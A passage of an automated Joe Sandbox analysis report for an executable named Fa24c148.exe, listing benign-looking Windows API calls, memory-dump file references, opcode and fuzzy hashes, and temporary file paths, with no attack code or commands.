                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                    • String ID: Tahoma
                                                                                                    • API String ID: 3808545654-3580928618
                                                                                                    • Opcode ID: 86243b7d43fd1254334335eab61183055d5a94c6c62a8693a7ecd88f836f01fe
                                                                                                    • Instruction ID: 50cd7c3d9b324c63c10bedbdfe153cfa446442d7209eb1202fb80f546c31283e
                                                                                                    • Opcode Fuzzy Hash: 86243b7d43fd1254334335eab61183055d5a94c6c62a8693a7ecd88f836f01fe
                                                                                                    • Instruction Fuzzy Hash: D3016D71944280AFEB116BB0AE0AB9ABF74DF55301F14847AF141B62F2C7791005DBAE
                                                                                                    APIs
                                                                                                    • wsprintfW.USER32 ref: 100024E1
                                                                                                    • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                                                                      • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,74DEFFC0,100011AA,?,00000000), ref: 1000131E
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2032781626.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2032762594.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032798460.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032821608.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2435812281-0
                                                                                                    • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                    • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                                    • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                    • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                                    APIs
                                                                                                      • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                      • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2032781626.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2032762594.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032798460.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032821608.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeGlobal$lstrcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 176019282-0
                                                                                                    • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                    • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                                    • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                    • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                                    • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2032781626.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2032762594.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032798460.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032821608.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1148316912-0
                                                                                                    • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                    • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                    • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                    • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: 11a1351ddf50c58e35ddc122bd4c143b08e9209a670521ddf1897a2708112133
                                                                                                    • Instruction ID: 5f088aa0ca27e90fd893fee14e64151101962dab4a112754cbcab5b472a91c15
                                                                                                    • Opcode Fuzzy Hash: 11a1351ddf50c58e35ddc122bd4c143b08e9209a670521ddf1897a2708112133
                                                                                                    • Instruction Fuzzy Hash: 53F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08315B104466F601F5190C674AD018B39
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(00422698,00422698,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404896
                                                                                                    • wsprintfW.USER32 ref: 0040489F
                                                                                                    • SetDlgItemTextW.USER32(?,00422698), ref: 004048B2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s
                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                    • Opcode ID: 3ce40e38d5b697acbaf551dfd4031fa8a76976e20437f1852b8b62a4044f6b57
                                                                                                    • Instruction ID: 59e17c8afd225f679fed4f3ac3ee25800eeb16d6bc796772b25e59257c8be9d1
                                                                                                    • Opcode Fuzzy Hash: 3ce40e38d5b697acbaf551dfd4031fa8a76976e20437f1852b8b62a4044f6b57
                                                                                                    • Instruction Fuzzy Hash: FB11E2776002243BDB10666D9C49EEF369DDBC6334F14863BFA29F61D1E978881186E8
                                                                                                    APIs
                                                                                                    • CharNextW.USER32(?,?,C:\,?,004058E1,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 0040587B
                                                                                                    • CharNextW.USER32(00000000), ref: 00405880
                                                                                                    • CharNextW.USER32(00000000), ref: 00405898
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext
                                                                                                    • String ID: C:\
                                                                                                    • API String ID: 3213498283-3404278061
                                                                                                    • Opcode ID: b0c2eef9241feed9457590fddbc2aab5f3d07ba2361cf94bd4ebf9b70b50b23f
                                                                                                    • Instruction ID: 0e45d3d7899051d123986adb95df4b68677bfc9f51f839bc1fffa0be8c86f108
                                                                                                    • Opcode Fuzzy Hash: b0c2eef9241feed9457590fddbc2aab5f3d07ba2361cf94bd4ebf9b70b50b23f
                                                                                                    • Instruction Fuzzy Hash: ABF09013910F1195DF3176584C55A7B6BBCEF54361B04C03BEE42B72C0D3B84CA58A9A
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 004057C8
                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031E9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 004057D2
                                                                                                    • lstrcatW.KERNEL32(?,00409014), ref: 004057E4
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004057C2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                    • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                    • Instruction ID: 6d7e1b30bb844f15b9b36030bcc4b7738a51439c8837860c8faeba4cfa6a7ffc
                                                                                                    • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                    • Instruction Fuzzy Hash: 81D0A721505930AAC2127B448C04DDF73ACEE45340340483BF600B30E1C7781D418BFD
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                    • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                    • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                      • Part of subcall function 00405CBE: wsprintfW.USER32 ref: 00405CCB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1404258612-0
                                                                                                    • Opcode ID: a69f105ff7c1ed7042804ff3785ec88b73d7adcb7f3cde9c988f9f75693ffed6
                                                                                                    • Instruction ID: c80361359d7f931d767c6e620dd41e9efa8b0f2766ef6758dcd107922aa8e93c
                                                                                                    • Opcode Fuzzy Hash: a69f105ff7c1ed7042804ff3785ec88b73d7adcb7f3cde9c988f9f75693ffed6
                                                                                                    • Instruction Fuzzy Hash: 8E110671A00109AEEB11DFA5C945DEEBBB9EF44344F21407AF901F62A1D7349E50DB68
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(00000000,00000000,00402EE5,00000001,?,?,?,00000000,00403425,?), ref: 00402D18
                                                                                                    • GetTickCount.KERNEL32 ref: 00402D36
                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402D53
                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403425,?), ref: 00402D61
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
